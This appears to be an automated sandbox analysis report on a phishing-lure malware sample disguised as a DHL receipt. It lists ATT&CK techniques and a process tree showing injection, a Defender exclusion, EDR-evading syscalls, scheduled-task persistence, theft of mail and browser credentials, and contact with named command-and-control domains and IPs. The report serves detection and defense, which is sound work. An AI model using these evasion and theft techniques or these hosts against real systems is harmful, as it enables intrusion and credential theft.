                Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (41); Process Injection (512); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); Software Packing (12); Timestomp (1); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (113); Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                Behavior Graph

                Behavior Graph ID: 1627806 | Sample: DHL AWB Receipt_pdf.bat.exe | Startdate: 03/03/2025 | Architecture: WINDOWS | Score: 100

                The graph is rendered below as a process tree; the number in square brackets after a process is the count shown next to that node in the graph.

                Start
                  DNS/IP info: www.publicblockchain.xyz; www.031233435.xyz; 13 other IPs or domains
                  Signatures: Antivirus detection for URL or domain; Sigma detected: Scheduled temp file as task from temp location; Multi AV Scanner detection for submitted file; 8 other signatures
                  Signature on www.031233435.xyz: Performs DNS queries to domains with low reputation
                  DHL AWB Receipt_pdf.bat.exe [7] (started)
                    Dropped files: C:\Users\user\AppData\...\oSJLRdDbLeQ.exe (PE32); C:\Users\...\oSJLRdDbLeQ.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpD3C2.tmp (XML); C:\Users\...\DHL AWB Receipt_pdf.bat.exe.log (ASCII)
                    Signatures: Writes to foreign memory regions; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                    RegSvcs.exe (started)
                      Signature: Maps a DLL or memory area into another process
                      ctd5Fl0jEEYLVK.exe (injected)
                        Signature: Found direct / indirect Syscall (likely to bypass EDR)
                        EhStorAuthn.exe (started)
                          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                          ctd5Fl0jEEYLVK.exe (injected)
                            DNS/IP info: 031233435.xyz 144.76.229.203, ports 50010, 50011, 50012 (HETZNER-ASDE, Germany); www.publicblockchain.xyz 13.248.169.48, ports 58476, 58477, 58478 (AMAZON-02US, United States); 8 other IPs or domains
                            Signature: Found direct / indirect Syscall (likely to bypass EDR)
                          firefox.exe (started)
                    powershell.exe [23] (started)
                      Signature: Loading BitLocker PowerShell Module
                      WmiPrvSE.exe (started)
                      conhost.exe (started)
                    powershell.exe [23] (started)
                      conhost.exe (started)
                    3 other processes (started)
                      conhost.exe (started)
                  oSJLRdDbLeQ.exe [5] (started)
                    Signature: Multi AV Scanner detection for dropped file
                    schtasks.exe [1] (started)
                      conhost.exe (started)
                    RegSvcs.exe (started)

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.